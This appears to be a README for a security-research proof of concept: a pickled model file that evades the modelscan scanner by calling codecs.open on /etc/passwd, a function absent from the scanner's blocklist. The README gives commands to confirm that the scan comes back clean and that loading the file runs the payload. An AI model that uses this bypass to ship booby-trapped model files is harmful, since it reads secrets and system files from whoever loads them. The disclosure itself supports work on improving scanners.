README.md

metadata

license: mit
tags:
  - security-research
  - modelscan-bypass

modelscan-bypass-codecs-fileread

Impact

HIGH - Read arbitrary files (secrets, keys, config)

Technique

codecs.open('/etc/passwd', 'r') - codecs not in blocklist

Verification

# Scan with modelscan - should show "No issues found"
modelscan scan -p model.pkl

# Execute to verify malicious behavior
python3 -c "import pickle; pickle.loads(open('model.pkl','rb').read())"

Details

Modelscan bypass via codecs.open - Arbitrary file read Tested against modelscan v0.7.6 (latest PyPI release).